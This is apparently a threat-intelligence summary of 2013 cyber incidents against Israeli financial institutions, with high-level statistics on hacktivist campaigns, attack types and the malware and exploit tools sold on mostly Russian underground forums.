This report comprises an analysis of data amassed from major cyber incidents pertaining to financial institutions in Israel over the past year, as reflected in the alerts, weekly and monthly reports produced by our Cyber Intelligence team. The analysis can be summarized as follows:

  • The majority of Hacktivist campaigns were directed against the government and financial sectors.
  • Interestingly, we have found no correlation between the attack dates and any symbolically significant dates.
  • The main threat actors were political activists and political cyber warriors.
  • The more popular attack types were data leakage (exploitation) attacks, resource depletion attacks, injection attacks and social engineering attacks.

Additionally, the report includes an analysis of data collected on the sale of attack tools on underground forums (mostly Russian). The analysis comprises 42 tools and exploits, summarized as follows:

  • The most popular tools for sale on the underground are bots and exploits (some sold as exploit kits), followed by Trojan horses.
  • Their main purpose is stealing financial information.
  • The main functions of the tools sold included running Web injection attacks and grabbers, intercepting and forwarding SMS messages and calls from cell phones, Keyloggers, and DDoS attack tools.
  • Java was the application identified as most vulnerable, i.e. most frequently targeted by the exploits on sale.
  • The most targeted Web browser was Internet Explorer, followed closely by Firefox.
  • The most targeted operating system was Windows.

Event Classification

This summary is based on major cyber events pertinent to the financial sector, as published in the various reports we issued throughout the year. The analysis is based on data from over 40 cyber events.

The majority of incidents reported are specifically relevant to the financial sector, but also include a category for general threats to Israeli websites, mainly from political threat elements. This classification is evident in the graph below, with the leading threats being financial, data loss, defacement and DDoS.


Timeline of Events 2013


Classification of the Sale of Attack Tools on the Underground

The summary was based on all malware/exploit sales for the past year that appeared on underground forums, mainly Russian forums, monitored by us – more than 40 in total. The majority of tools for sale are bots, followed by exploits or exploit kits. Trojan horses are also offered for sale, but less frequently.
